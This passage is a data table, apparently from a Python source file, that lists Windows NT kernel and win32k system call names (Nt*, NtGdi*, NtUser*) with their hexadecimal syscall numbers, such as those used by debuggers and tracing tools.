'NtApphelpCacheControl', # 0x29
'NtAreMappedFilesTheSame', # 0x2a
'NtAssignProcessToJobObject', # 0x2b
'NtCallbackReturn', # 0x2c
'NtCancelIoFile', # 0x2d
'NtCancelIoFileEx', # 0x2e
'NtCancelSynchronousIoFile', # 0x2f
'NtCancelTimer', # 0x30
'NtClearEvent', # 0x31
'NtClose', # 0x32
'NtCloseObjectAuditAlarm', # 0x33
'NtCommitComplete', # 0x34
'NtCommitEnlistment', # 0x35
'NtCommitTransaction', # 0x36
'NtCompactKeys', # 0x37
'NtCompareTokens', # 0x38
'NtCompleteConnectPort', # 0x39
'NtCompressKey', # 0x3a
'NtConnectPort', # 0x3b
'NtContinue', # 0x3c
'NtCreateDebugObject', # 0x3d
'NtCreateDirectoryObject', # 0x3e
'NtCreateEnlistment', # 0x3f
'NtCreateEvent', # 0x40
'NtCreateEventPair', # 0x41
'NtCreateFile', # 0x42
'NtCreateIoCompletion', # 0x43
'NtCreateJobObject', # 0x44
'NtCreateJobSet', # 0x45
'NtCreateKey', # 0x46
'NtCreateKeyedEvent', # 0x47
'NtCreateKeyTransacted', # 0x48
'NtCreateMailslotFile', # 0x49
'NtCreateMutant', # 0x4a
'NtCreateNamedPipeFile', # 0x4b
'NtCreatePagingFile', # 0x4c
'NtCreatePort', # 0x4d
'NtCreatePrivateNamespace', # 0x4e
'NtCreateProcess', # 0x4f
'NtCreateProcessEx', # 0x50
'NtCreateProfile', # 0x51
'NtCreateProfileEx', # 0x52
'NtCreateResourceManager', # 0x53
'NtCreateSection', # 0x54
'NtCreateSemaphore', # 0x55
'NtCreateSymbolicLinkObject', # 0x56
'NtCreateThread', # 0x57
'NtCreateThreadEx', # 0x58
'NtCreateTimer', # 0x59
'NtCreateToken', # 0x5a
'NtCreateTransaction', # 0x5b
'NtCreateTransactionManager', # 0x5c
'NtCreateUserProcess', # 0x5d
'NtCreateWaitablePort', # 0x5e
'NtCreateWorkerFactory', # 0x5f
'NtDebugActiveProcess', # 0x60
'NtDebugContinue', # 0x61
'NtDelayExecution', # 0x62
'NtDeleteAtom', # 0x63
'NtDeleteBootEntry', # 0x64
'NtDeleteDriverEntry', # 0x65
'NtDeleteFile', # 0x66
'NtDeleteKey', # 0x67
'NtDeleteObjectAuditAlarm', # 0x68
'NtDeletePrivateNamespace', # 0x69
'NtDeleteValueKey', # 0x6a
'NtDeviceIoControlFile', # 0x6b
'NtDisableLastKnownGood', # 0x6c
'NtDisplayString', # 0x6d
'NtDrawText', # 0x6e
'NtDuplicateObject', # 0x6f
'NtDuplicateToken', # 0x70
'NtEnableLastKnownGood', # 0x71
'NtEnumerateBootEntries', # 0x72
'NtEnumerateDriverEntries', # 0x73
'NtEnumerateKey', # 0x74
'NtEnumerateSystemEnvironmentValuesEx', # 0x75
'NtEnumerateTransactionObject', # 0x76
'NtEnumerateValueKey', # 0x77
'NtExtendSection', # 0x78
'NtFilterToken', # 0x79
'NtFindAtom', # 0x7a
'NtFlushBuffersFile', # 0x7b
'NtFlushInstallUILanguage', # 0x7c
'NtFlushInstructionCache', # 0x7d
'NtFlushKey', # 0x7e
'NtFlushProcessWriteBuffers', # 0x7f
'NtFlushVirtualMemory', # 0x80
'NtFlushWriteBuffer', # 0x81
'NtFreeUserPhysicalPages', # 0x82
'NtFreeVirtualMemory', # 0x83
'NtFreezeRegistry', # 0x84
'NtFreezeTransactions', # 0x85
'NtFsControlFile', # 0x86
'NtGetContextThread', # 0x87
'NtGetCurrentProcessorNumber', # 0x88
'NtGetDevicePowerState', # 0x89
'NtGetMUIRegistryInfo', # 0x8a
'NtGetNextProcess', # 0x8b
'NtGetNextThread', # 0x8c
'NtGetNlsSectionPtr', # 0x8d
'NtGetNotificationResourceManager', # 0x8e
'NtGetPlugPlayEvent', # 0x8f
'NtGetWriteWatch', # 0x90
'NtImpersonateAnonymousToken', # 0x91
'NtImpersonateClientOfPort', # 0x92
'NtImpersonateThread', # 0x93
'NtInitializeNlsFiles', # 0x94
'NtInitializeRegistry', # 0x95
'NtInitiatePowerAction', # 0x96
'NtIsProcessInJob', # 0x97
'NtIsSystemResumeAutomatic', # 0x98
'NtIsUILanguageComitted', # 0x99
'NtListenPort', # 0x9a
'NtLoadDriver', # 0x9b
'NtLoadKey', # 0x9c
'NtLoadKey2', # 0x9d
'NtLoadKeyEx', # 0x9e
'NtLockFile', # 0x9f
'NtLockProductActivationKeys', # 0xa0
'NtLockRegistryKey', # 0xa1
'NtLockVirtualMemory', # 0xa2
'NtMakePermanentObject', # 0xa3
'NtMakeTemporaryObject', # 0xa4
'NtMapCMFModule', # 0xa5
'NtMapUserPhysicalPages', # 0xa6
'NtMapUserPhysicalPagesScatter', # 0xa7
'NtMapViewOfSection', # 0xa8
'NtModifyBootEntry', # 0xa9
'NtModifyDriverEntry', # 0xaa
'NtNotifyChangeDirectoryFile', # 0xab
'NtNotifyChangeKey', # 0xac
'NtNotifyChangeMultipleKeys', # 0xad
'NtNotifyChangeSession', # 0xae
'NtOpenDirectoryObject', # 0xaf
'NtOpenEnlistment', # 0xb0
'NtOpenEvent', # 0xb1
'NtOpenEventPair', # 0xb2
'NtOpenFile', # 0xb3
'NtOpenIoCompletion', # 0xb4
'NtOpenJobObject', # 0xb5
'NtOpenKey', # 0xb6
'NtOpenKeyEx', # 0xb7
'NtOpenKeyedEvent', # 0xb8
'NtOpenKeyTransacted', # 0xb9
'NtOpenKeyTransactedEx', # 0xba
'NtOpenMutant', # 0xbb
'NtOpenObjectAuditAlarm', # 0xbc
'NtOpenPrivateNamespace', # 0xbd
'NtOpenProcess', # 0xbe
'NtOpenProcessToken', # 0xbf
'NtOpenProcessTokenEx', # 0xc0
'NtOpenResourceManager', # 0xc1
'NtOpenSection', # 0xc2
'NtOpenSemaphore', # 0xc3
'NtOpenSession', # 0xc4
'NtOpenSymbolicLinkObject', # 0xc5
'NtOpenThread', # 0xc6
'NtOpenThreadToken', # 0xc7
'NtOpenThreadTokenEx', # 0xc8
'NtOpenTimer', # 0xc9
'NtOpenTransaction', # 0xca
'NtOpenTransactionManager', # 0xcb
'NtPlugPlayControl', # 0xcc
'NtPowerInformation', # 0xcd
'NtPrepareComplete', # 0xce
'NtPrepareEnlistment', # 0xcf
'NtPrePrepareComplete', # 0xd0
'NtPrePrepareEnlistment', # 0xd1
'NtPrivilegeCheck', # 0xd2
'NtPrivilegedServiceAuditAlarm', # 0xd3
'NtPrivilegeObjectAuditAlarm', # 0xd4
'NtPropagationComplete', # 0xd5
'NtPropagationFailed', # 0xd6
'NtProtectVirtualMemory', # 0xd7
'NtPulseEvent', # 0xd8
'NtQueryAttributesFile', # 0xd9
'NtQueryBootEntryOrder', # 0xda
'NtQueryBootOptions', # 0xdb
'NtQueryDebugFilterState', # 0xdc
'NtQueryDefaultLocale', # 0xdd
'NtQueryDefaultUILanguage', # 0xde
'NtQueryDirectoryFile', # 0xdf
'NtQueryDirectoryObject', # 0xe0
'NtQueryDriverEntryOrder', # 0xe1
'NtQueryEaFile', # 0xe2
'NtQueryEvent', # 0xe3
'NtQueryFullAttributesFile', # 0xe4
'NtQueryInformationAtom', # 0xe5
'NtQueryInformationEnlistment', # 0xe6
'NtQueryInformationFile', # 0xe7
'NtQueryInformationJobObject', # 0xe8
'NtQueryInformationPort', # 0xe9
'NtQueryInformationProcess', # 0xea
'NtQueryInformationResourceManager', # 0xeb
'NtQueryInformationThread', # 0xec
'NtQueryInformationToken', # 0xed
'NtQueryInformationTransaction', # 0xee
'NtQueryInformationTransactionManager', # 0xef
'NtQueryInformationWorkerFactory', # 0xf0
'NtQueryInstallUILanguage', # 0xf1
'NtQueryIntervalProfile', # 0xf2
'NtQueryIoCompletion', # 0xf3
'NtQueryKey', # 0xf4
'NtQueryLicenseValue', # 0xf5
'NtQueryMultipleValueKey', # 0xf6
'NtQueryMutant', # 0xf7
'NtQueryObject', # 0xf8
'NtQueryOpenSubKeys', # 0xf9
'NtQueryOpenSubKeysEx', # 0xfa
'NtQueryPerformanceCounter', # 0xfb
'NtQueryPortInformationProcess', # 0xfc
'NtQueryQuotaInformationFile', # 0xfd
'NtQuerySection', # 0xfe
'NtQuerySecurityAttributesToken', # 0xff
'NtQuerySecurityObject', # 0x100
'NtQuerySemaphore', # 0x101
'NtQuerySymbolicLinkObject', # 0x102
'NtQuerySystemEnvironmentValue', # 0x103
'NtQuerySystemEnvironmentValueEx', # 0x104
'NtQuerySystemInformation', # 0x105
'NtQuerySystemInformationEx', # 0x106
'NtQuerySystemTime', # 0x107
'NtQueryTimer', # 0x108
'NtQueryTimerResolution', # 0x109
'NtQueryValueKey', # 0x10a
'NtQueryVirtualMemory', # 0x10b
'NtQueryVolumeInformationFile', # 0x10c
'NtQueueApcThread', # 0x10d
'NtQueueApcThreadEx', # 0x10e
'NtRaiseException', # 0x10f
'NtRaiseHardError', # 0x110
'NtReadFile', # 0x111
'NtReadFileScatter', # 0x112
'NtReadOnlyEnlistment', # 0x113
'NtReadRequestData', # 0x114
'NtReadVirtualMemory', # 0x115
'NtRecoverEnlistment', # 0x116
'NtRecoverResourceManager', # 0x117
'NtRecoverTransactionManager', # 0x118
'NtRegisterProtocolAddressInformation', # 0x119
'NtRegisterThreadTerminatePort', # 0x11a
'NtReleaseKeyedEvent', # 0x11b
'NtReleaseMutant', # 0x11c
'NtReleaseSemaphore', # 0x11d
'NtReleaseWorkerFactoryWorker', # 0x11e
'NtRemoveIoCompletion', # 0x11f
'NtRemoveIoCompletionEx', # 0x120
'NtRemoveProcessDebug', # 0x121
'NtRenameKey', # 0x122
'NtRenameTransactionManager', # 0x123
'NtReplaceKey', # 0x124
'NtReplacePartitionUnit', # 0x125
'NtReplyPort', # 0x126
'NtReplyWaitReceivePort', # 0x127
'NtReplyWaitReceivePortEx', # 0x128
'NtReplyWaitReplyPort', # 0x129
'NtRequestPort', # 0x12a
'NtRequestWaitReplyPort', # 0x12b
'NtResetEvent', # 0x12c
'NtResetWriteWatch', # 0x12d
'NtRestoreKey', # 0x12e
'NtResumeProcess', # 0x12f
'NtResumeThread', # 0x130
'NtRollbackComplete', # 0x131
'NtRollbackEnlistment', # 0x132
'NtRollbackTransaction', # 0x133
'NtRollforwardTransactionManager', # 0x134
'NtSaveKey', # 0x135
'NtSaveKeyEx', # 0x136
'NtSaveMergedKeys', # 0x137
'NtSecureConnectPort', # 0x138
'NtSerializeBoot', # 0x139
'NtSetBootEntryOrder', # 0x13a
'NtSetBootOptions', # 0x13b
'NtSetContextThread', # 0x13c
'NtSetDebugFilterState', # 0x13d
'NtSetDefaultHardErrorPort', # 0x13e
'NtSetDefaultLocale', # 0x13f
'NtSetDefaultUILanguage', # 0x140
'NtSetDriverEntryOrder', # 0x141
'NtSetEaFile', # 0x142
'NtSetEvent', # 0x143
'NtSetEventBoostPriority', # 0x144
'NtSetHighEventPair', # 0x145
'NtSetHighWaitLowEventPair', # 0x146
'NtSetInformationDebugObject', # 0x147
'NtSetInformationEnlistment', # 0x148
'NtSetInformationFile', # 0x149
'NtSetInformationJobObject', # 0x14a
'NtSetInformationKey', # 0x14b
'NtSetInformationObject', # 0x14c
'NtSetInformationProcess', # 0x14d
'NtSetInformationResourceManager', # 0x14e
'NtSetInformationThread', # 0x14f
'NtSetInformationToken', # 0x150
'NtSetInformationTransaction', # 0x151
'NtSetInformationTransactionManager', # 0x152
'NtSetInformationWorkerFactory', # 0x153
'NtSetIntervalProfile', # 0x154
'NtSetIoCompletion', # 0x155
'NtSetIoCompletionEx', # 0x156
'NtSetLdtEntries', # 0x157
'NtSetLowEventPair', # 0x158
'NtSetLowWaitHighEventPair', # 0x159
'NtSetQuotaInformationFile', # 0x15a
'NtSetSecurityObject', # 0x15b
'NtSetSystemEnvironmentValue', # 0x15c
'NtSetSystemEnvironmentValueEx', # 0x15d
'NtSetSystemInformation', # 0x15e
'NtSetSystemPowerState', # 0x15f
'NtSetSystemTime', # 0x160
'NtSetThreadExecutionState', # 0x161
'NtSetTimer', # 0x162
'NtSetTimerEx', # 0x163
'NtSetTimerResolution', # 0x164
'NtSetUuidSeed', # 0x165
'NtSetValueKey', # 0x166
'NtSetVolumeInformationFile', # 0x167
'NtShutdownSystem', # 0x168
'NtShutdownWorkerFactory', # 0x169
'NtSignalAndWaitForSingleObject', # 0x16a
'NtSinglePhaseReject', # 0x16b
'NtStartProfile', # 0x16c
'NtStopProfile', # 0x16d
'NtSuspendProcess', # 0x16e
'NtSuspendThread', # 0x16f
'NtSystemDebugControl', # 0x170
'NtTerminateJobObject', # 0x171
'NtTerminateProcess', # 0x172
'NtTerminateThread', # 0x173
'NtTestAlert', # 0x174
'NtThawRegistry', # 0x175
'NtThawTransactions', # 0x176
'NtTraceControl', # 0x177
'NtTraceEvent', # 0x178
'NtTranslateFilePath', # 0x179
'NtUmsThreadYield', # 0x17a
'NtUnloadDriver', # 0x17b
'NtUnloadKey', # 0x17c
'NtUnloadKey2', # 0x17d
'NtUnloadKeyEx', # 0x17e
'NtUnlockFile', # 0x17f
'NtUnlockVirtualMemory', # 0x180
'NtUnmapViewOfSection', # 0x181
'NtVdmControl', # 0x182
'NtWaitForDebugEvent', # 0x183
'NtWaitForKeyedEvent', # 0x184
'NtWaitForMultipleObjects', # 0x185
'NtWaitForMultipleObjects32', # 0x186
'NtWaitForSingleObject', # 0x187
'NtWaitForWorkViaWorkerFactory', # 0x188
'NtWaitHighEventPair', # 0x189
'NtWaitLowEventPair', # 0x18a
'NtWorkerFactoryWorkerReady', # 0x18b
'NtWriteFile', # 0x18c
'NtWriteFileGather', # 0x18d
'NtWriteRequestData', # 0x18e
'NtWriteVirtualMemory', # 0x18f
'NtYieldExecution', # 0x190
],
[
'NtGdiAbortDoc', # 0x0
'NtGdiAbortPath', # 0x1
'NtGdiAddFontResourceW', # 0x2
'NtGdiAddRemoteFontToDC', # 0x3
'NtGdiAddFontMemResourceEx', # 0x4
'NtGdiRemoveMergeFont', # 0x5
'NtGdiAddRemoteMMInstanceToDC', # 0x6
'NtGdiAlphaBlend', # 0x7
'NtGdiAngleArc', # 0x8
'NtGdiAnyLinkedFonts', # 0x9
'NtGdiFontIsLinked', # 0xa
'NtGdiArcInternal', # 0xb
'NtGdiBeginGdiRendering', # 0xc
'NtGdiBeginPath', # 0xd
'NtGdiBitBlt', # 0xe
'NtGdiCancelDC', # 0xf
'NtGdiCheckBitmapBits', # 0x10
'NtGdiCloseFigure', # 0x11
'NtGdiClearBitmapAttributes', # 0x12
'NtGdiClearBrushAttributes', # 0x13
'NtGdiColorCorrectPalette', # 0x14
'NtGdiCombineRgn', # 0x15
'NtGdiCombineTransform', # 0x16
'NtGdiComputeXformCoefficients', # 0x17
'NtGdiConfigureOPMProtectedOutput', # 0x18
'NtGdiConvertMetafileRect', # 0x19
'NtGdiCreateBitmap', # 0x1a
'NtGdiCreateBitmapFromDxSurface', # 0x1b
'NtGdiCreateClientObj', # 0x1c
'NtGdiCreateColorSpace', # 0x1d
'NtGdiCreateColorTransform', # 0x1e
'NtGdiCreateCompatibleBitmap', # 0x1f
'NtGdiCreateCompatibleDC', # 0x20
'NtGdiCreateDIBBrush', # 0x21
'NtGdiCreateDIBitmapInternal', # 0x22
'NtGdiCreateDIBSection', # 0x23
'NtGdiCreateEllipticRgn', # 0x24
'NtGdiCreateHalftonePalette', # 0x25
'NtGdiCreateHatchBrushInternal', # 0x26
'NtGdiCreateMetafileDC', # 0x27
'NtGdiCreateOPMProtectedOutputs', # 0x28
'NtGdiCreatePaletteInternal', # 0x29
'NtGdiCreatePatternBrushInternal', # 0x2a
'NtGdiCreatePen', # 0x2b
'NtGdiCreateRectRgn', # 0x2c
'NtGdiCreateRoundRectRgn', # 0x2d
'NtGdiCreateServerMetaFile', # 0x2e
'NtGdiCreateSolidBrush', # 0x2f
'NtGdiD3dContextCreate', # 0x30
'NtGdiD3dContextDestroy', # 0x31
'NtGdiD3dContextDestroyAll', # 0x32
'NtGdiD3dValidateTextureStageState', # 0x33
'NtGdiD3dDrawPrimitives2', # 0x34
'NtGdiDdGetDriverState', # 0x35
'NtGdiDdAddAttachedSurface', # 0x36
'NtGdiDdAlphaBlt', # 0x37
'NtGdiDdAttachSurface', # 0x38
'NtGdiDdBeginMoCompFrame', # 0x39
'NtGdiDdBlt', # 0x3a
'NtGdiDdCanCreateSurface', # 0x3b
'NtGdiDdCanCreateD3DBuffer', # 0x3c
'NtGdiDdColorControl', # 0x3d
'NtGdiDdCreateDirectDrawObject', # 0x3e
'NtGdiDdCreateSurface', # 0x3f
'NtGdiDdCreateD3DBuffer', # 0x40
'NtGdiDdCreateMoComp', # 0x41
'NtGdiDdCreateSurfaceObject', # 0x42
'NtGdiDdDeleteDirectDrawObject', # 0x43
'NtGdiDdDeleteSurfaceObject', # 0x44
'NtGdiDdDestroyMoComp', # 0x45
'NtGdiDdDestroySurface', # 0x46
'NtGdiDdDestroyD3DBuffer', # 0x47
'NtGdiDdEndMoCompFrame', # 0x48
'NtGdiDdFlip', # 0x49
'NtGdiDdFlipToGDISurface', # 0x4a
'NtGdiDdGetAvailDriverMemory', # 0x4b
'NtGdiDdGetBltStatus', # 0x4c
'NtGdiDdGetDC', # 0x4d
'NtGdiDdGetDriverInfo', # 0x4e
'NtGdiDdGetDxHandle', # 0x4f
'NtGdiDdGetFlipStatus', # 0x50
'NtGdiDdGetInternalMoCompInfo', # 0x51
'NtGdiDdGetMoCompBuffInfo', # 0x52
'NtGdiDdGetMoCompGuids', # 0x53
'NtGdiDdGetMoCompFormats', # 0x54
'NtGdiDdGetScanLine', # 0x55
'NtGdiDdLock', # 0x56
'NtGdiDdLockD3D', # 0x57
'NtGdiDdQueryDirectDrawObject', # 0x58
'NtGdiDdQueryMoCompStatus', # 0x59
'NtGdiDdReenableDirectDrawObject', # 0x5a
'NtGdiDdReleaseDC', # 0x5b
'NtGdiDdRenderMoComp', # 0x5c
'NtGdiDdResetVisrgn', # 0x5d
'NtGdiDdSetColorKey', # 0x5e
'NtGdiDdSetExclusiveMode', # 0x5f
'NtGdiDdSetGammaRamp', # 0x60
'NtGdiDdCreateSurfaceEx', # 0x61
'NtGdiDdSetOverlayPosition', # 0x62
'NtGdiDdUnattachSurface', # 0x63
'NtGdiDdUnlock', # 0x64
'NtGdiDdUnlockD3D', # 0x65
'NtGdiDdUpdateOverlay', # 0x66
'NtGdiDdWaitForVerticalBlank', # 0x67
'NtGdiDvpCanCreateVideoPort', # 0x68
'NtGdiDvpColorControl', # 0x69
'NtGdiDvpCreateVideoPort', # 0x6a
'NtGdiDvpDestroyVideoPort', # 0x6b
'NtGdiDvpFlipVideoPort', # 0x6c
'NtGdiDvpGetVideoPortBandwidth', # 0x6d
'NtGdiDvpGetVideoPortField', # 0x6e
'NtGdiDvpGetVideoPortFlipStatus', # 0x6f
'NtGdiDvpGetVideoPortInputFormats', # 0x70
'NtGdiDvpGetVideoPortLine', # 0x71
'NtGdiDvpGetVideoPortOutputFormats', # 0x72
'NtGdiDvpGetVideoPortConnectInfo', # 0x73
'NtGdiDvpGetVideoSignalStatus', # 0x74
'NtGdiDvpUpdateVideoPort', # 0x75
'NtGdiDvpWaitForVideoPortSync', # 0x76
'NtGdiDvpAcquireNotification', # 0x77
'NtGdiDvpReleaseNotification', # 0x78
'NtGdiDxgGenericThunk', # 0x79
'NtGdiDeleteClientObj', # 0x7a
'NtGdiDeleteColorSpace', # 0x7b
'NtGdiDeleteColorTransform', # 0x7c
'NtGdiDeleteObjectApp', # 0x7d
'NtGdiDescribePixelFormat', # 0x7e
'NtGdiDestroyOPMProtectedOutput', # 0x7f
'NtGdiGetPerBandInfo', # 0x80
'NtGdiDoBanding', # 0x81
'NtGdiDoPalette', # 0x82
'NtGdiDrawEscape', # 0x83
'NtGdiEllipse', # 0x84
'NtGdiEnableEudc', # 0x85
'NtGdiEndDoc', # 0x86
'NtGdiEndGdiRendering', # 0x87
'NtGdiEndPage', # 0x88
'NtGdiEndPath', # 0x89
'NtGdiEnumFonts', # 0x8a
'NtGdiEnumObjects', # 0x8b
'NtGdiEqualRgn', # 0x8c
'NtGdiEudcLoadUnloadLink', # 0x8d
'NtGdiExcludeClipRect', # 0x8e
'NtGdiExtCreatePen', # 0x8f
'NtGdiExtCreateRegion', # 0x90
'NtGdiExtEscape', # 0x91
'NtGdiExtFloodFill', # 0x92
'NtGdiExtGetObjectW', # 0x93
'NtGdiExtSelectClipRgn', # 0x94
'NtGdiExtTextOutW', # 0x95
'NtGdiFillPath', # 0x96
'NtGdiFillRgn', # 0x97
'NtGdiFlattenPath', # 0x98
'NtGdiFlush', # 0x99
'NtGdiForceUFIMapping', # 0x9a
'NtGdiFrameRgn', # 0x9b
'NtGdiFullscreenControl', # 0x9c
'NtGdiGetAndSetDCDword', # 0x9d
'NtGdiGetAppClipBox', # 0x9e
'NtGdiGetBitmapBits', # 0x9f
'NtGdiGetBitmapDimension', # 0xa0
'NtGdiGetBoundsRect', # 0xa1
'NtGdiGetCertificate', # 0xa2
'NtGdiGetCertificateSize', # 0xa3
'NtGdiGetCharABCWidthsW', # 0xa4
'NtGdiGetCharacterPlacementW', # 0xa5
'NtGdiGetCharSet', # 0xa6
'NtGdiGetCharWidthW', # 0xa7
'NtGdiGetCharWidthInfo', # 0xa8
'NtGdiGetColorAdjustment', # 0xa9
'NtGdiGetColorSpaceforBitmap', # 0xaa
'NtGdiGetCOPPCompatibleOPMInformation', # 0xab
'NtGdiGetDCDword', # 0xac
'NtGdiGetDCforBitmap', # 0xad
'NtGdiGetDCObject', # 0xae
'NtGdiGetDCPoint', # 0xaf
'NtGdiGetDeviceCaps', # 0xb0
'NtGdiGetDeviceGammaRamp', # 0xb1
'NtGdiGetDeviceCapsAll', # 0xb2
'NtGdiGetDIBitsInternal', # 0xb3
'NtGdiGetETM', # 0xb4
'NtGdiGetEudcTimeStampEx', # 0xb5
'NtGdiGetFontData', # 0xb6
'NtGdiGetFontFileData', # 0xb7
'NtGdiGetFontFileInfo', # 0xb8
'NtGdiGetFontResourceInfoInternalW', # 0xb9
'NtGdiGetGlyphIndicesW', # 0xba
'NtGdiGetGlyphIndicesWInternal', # 0xbb
'NtGdiGetGlyphOutline', # 0xbc
'NtGdiGetOPMInformation', # 0xbd
'NtGdiGetKerningPairs', # 0xbe
'NtGdiGetLinkedUFIs', # 0xbf
'NtGdiGetMiterLimit', # 0xc0
'NtGdiGetMonitorID', # 0xc1
'NtGdiGetNearestColor', # 0xc2
'NtGdiGetNearestPaletteIndex', # 0xc3
'NtGdiGetObjectBitmapHandle', # 0xc4
'NtGdiGetOPMRandomNumber', # 0xc5
'NtGdiGetOutlineTextMetricsInternalW', # 0xc6
'NtGdiGetPath', # 0xc7
'NtGdiGetPixel', # 0xc8
'NtGdiGetRandomRgn', # 0xc9
'NtGdiGetRasterizerCaps', # 0xca
'NtGdiGetRealizationInfo', # 0xcb
'NtGdiGetRegionData', # 0xcc
'NtGdiGetRgnBox', # 0xcd
'NtGdiGetServerMetaFileBits', # 0xce
'NtGdiGetSpoolMessage', # 0xcf
'NtGdiGetStats', # 0xd0
'NtGdiGetStockObject', # 0xd1
'NtGdiGetStringBitmapW', # 0xd2
'NtGdiGetSuggestedOPMProtectedOutputArraySize', # 0xd3
'NtGdiGetSystemPaletteUse', # 0xd4
'NtGdiGetTextCharsetInfo', # 0xd5
'NtGdiGetTextExtent', # 0xd6
'NtGdiGetTextExtentExW', # 0xd7
'NtGdiGetTextFaceW', # 0xd8
'NtGdiGetTextMetricsW', # 0xd9
'NtGdiGetTransform', # 0xda
'NtGdiGetUFI', # 0xdb
'NtGdiGetEmbUFI', # 0xdc
'NtGdiGetUFIPathname', # 0xdd
'NtGdiGetEmbedFonts', # 0xde
'NtGdiChangeGhostFont', # 0xdf
'NtGdiAddEmbFontToDC', # 0xe0
'NtGdiGetFontUnicodeRanges', # 0xe1
'NtGdiGetWidthTable', # 0xe2
'NtGdiGradientFill', # 0xe3
'NtGdiHfontCreate', # 0xe4
'NtGdiIcmBrushInfo', # 0xe5
'NtGdiInit', # 0xe6
'NtGdiInitSpool', # 0xe7
'NtGdiIntersectClipRect', # 0xe8
'NtGdiInvertRgn', # 0xe9
'NtGdiLineTo', # 0xea
'NtGdiMakeFontDir', # 0xeb
'NtGdiMakeInfoDC', # 0xec
'NtGdiMaskBlt', # 0xed
'NtGdiModifyWorldTransform', # 0xee
'NtGdiMonoBitmap', # 0xef
'NtGdiMoveTo', # 0xf0
'NtGdiOffsetClipRgn', # 0xf1
'NtGdiOffsetRgn', # 0xf2
'NtGdiOpenDCW', # 0xf3
'NtGdiPatBlt', # 0xf4
'NtGdiPolyPatBlt', # 0xf5
'NtGdiPathToRegion', # 0xf6
'NtGdiPlgBlt', # 0xf7
'NtGdiPolyDraw', # 0xf8
'NtGdiPolyPolyDraw', # 0xf9
'NtGdiPolyTextOutW', # 0xfa
'NtGdiPtInRegion', # 0xfb
'NtGdiPtVisible', # 0xfc
'NtGdiQueryFonts', # 0xfd
'NtGdiQueryFontAssocInfo', # 0xfe
'NtGdiRectangle', # 0xff
'NtGdiRectInRegion', # 0x100
'NtGdiRectVisible', # 0x101
'NtGdiRemoveFontResourceW', # 0x102
'NtGdiRemoveFontMemResourceEx', # 0x103
'NtGdiResetDC', # 0x104
'NtGdiResizePalette', # 0x105
'NtGdiRestoreDC', # 0x106
'NtGdiRoundRect', # 0x107
'NtGdiSaveDC', # 0x108
'NtGdiScaleViewportExtEx', # 0x109
'NtGdiScaleWindowExtEx', # 0x10a
'NtGdiSelectBitmap', # 0x10b
'NtGdiSelectBrush', # 0x10c
'NtGdiSelectClipPath', # 0x10d
'NtGdiSelectFont', # 0x10e
'NtGdiSelectPen', # 0x10f
'NtGdiSetBitmapAttributes', # 0x110
'NtGdiSetBitmapBits', # 0x111
'NtGdiSetBitmapDimension', # 0x112
'NtGdiSetBoundsRect', # 0x113
'NtGdiSetBrushAttributes', # 0x114
'NtGdiSetBrushOrg', # 0x115
'NtGdiSetColorAdjustment', # 0x116
'NtGdiSetColorSpace', # 0x117
'NtGdiSetDeviceGammaRamp', # 0x118
'NtGdiSetDIBitsToDeviceInternal', # 0x119
'NtGdiSetFontEnumeration', # 0x11a
'NtGdiSetFontXform', # 0x11b
'NtGdiSetIcmMode', # 0x11c
'NtGdiSetLinkedUFIs', # 0x11d
'NtGdiSetMagicColors', # 0x11e
'NtGdiSetMetaRgn', # 0x11f
'NtGdiSetMiterLimit', # 0x120
'NtGdiGetDeviceWidth', # 0x121
'NtGdiMirrorWindowOrg', # 0x122
'NtGdiSetLayout', # 0x123
'NtGdiSetOPMSigningKeyAndSequenceNumbers', # 0x124
'NtGdiSetPixel', # 0x125
'NtGdiSetPixelFormat', # 0x126
'NtGdiSetRectRgn', # 0x127
'NtGdiSetSystemPaletteUse', # 0x128
'NtGdiSetTextJustification', # 0x129
'NtGdiSetVirtualResolution', # 0x12a
'NtGdiSetSizeDevice', # 0x12b
'NtGdiStartDoc', # 0x12c
'NtGdiStartPage', # 0x12d
'NtGdiStretchBlt', # 0x12e
'NtGdiStretchDIBitsInternal', # 0x12f
'NtGdiStrokeAndFillPath', # 0x130
'NtGdiStrokePath', # 0x131
'NtGdiSwapBuffers', # 0x132
'NtGdiTransformPoints', # 0x133
'NtGdiTransparentBlt', # 0x134
'NtGdiUnloadPrinterDriver', # 0x135
'NtGdiUnmapMemFont', # 0x136
'NtGdiUnrealizeObject', # 0x137
'NtGdiUpdateColors', # 0x138
'NtGdiWidenPath', # 0x139
'NtUserActivateKeyboardLayout', # 0x13a
'NtUserAddClipboardFormatListener', # 0x13b
'NtUserAlterWindowStyle', # 0x13c
'NtUserAssociateInputContext', # 0x13d
'NtUserAttachThreadInput', # 0x13e
'NtUserBeginPaint', # 0x13f
'NtUserBitBltSysBmp', # 0x140
'NtUserBlockInput', # 0x141
'NtUserBuildHimcList', # 0x142
'NtUserBuildHwndList', # 0x143
'NtUserBuildNameList', # 0x144
'NtUserBuildPropList', # 0x145
'NtUserCallHwnd', # 0x146
'NtUserCallHwndLock', # 0x147
'NtUserCallHwndOpt', # 0x148
'NtUserCallHwndParam', # 0x149
'NtUserCallHwndParamLock', # 0x14a
'NtUserCallMsgFilter', # 0x14b
'NtUserCallNextHookEx', # 0x14c
'NtUserCallNoParam', # 0x14d
'NtUserCallOneParam', # 0x14e
'NtUserCallTwoParam', # 0x14f
'NtUserChangeClipboardChain', # 0x150
'NtUserChangeDisplaySettings', # 0x151
'NtUserGetDisplayConfigBufferSizes', # 0x152
'NtUserSetDisplayConfig', # 0x153
'NtUserQueryDisplayConfig', # 0x154
'NtUserDisplayConfigGetDeviceInfo', # 0x155
'NtUserDisplayConfigSetDeviceInfo', # 0x156
'NtUserCheckAccessForIntegrityLevel', # 0x157
'NtUserCheckDesktopByThreadId', # 0x158
'NtUserCheckWindowThreadDesktop', # 0x159
'NtUserCheckMenuItem', # 0x15a
'NtUserChildWindowFromPointEx', # 0x15b
'NtUserClipCursor', # 0x15c
'NtUserCloseClipboard', # 0x15d
'NtUserCloseDesktop', # 0x15e
'NtUserCloseWindowStation', # 0x15f
'NtUserConsoleControl', # 0x160
'NtUserConvertMemHandle', # 0x161
'NtUserCopyAcceleratorTable', # 0x162
'NtUserCountClipboardFormats', # 0x163
'NtUserCreateAcceleratorTable', # 0x164
'NtUserCreateCaret', # 0x165
'NtUserCreateDesktopEx', # 0x166
'NtUserCreateInputContext', # 0x167
'NtUserCreateLocalMemHandle', # 0x168
'NtUserCreateWindowEx', # 0x169
'NtUserCreateWindowStation', # 0x16a
'NtUserDdeInitialize', # 0x16b
'NtUserDeferWindowPos', # 0x16c
'NtUserDefSetText', # 0x16d
'NtUserDeleteMenu', # 0x16e
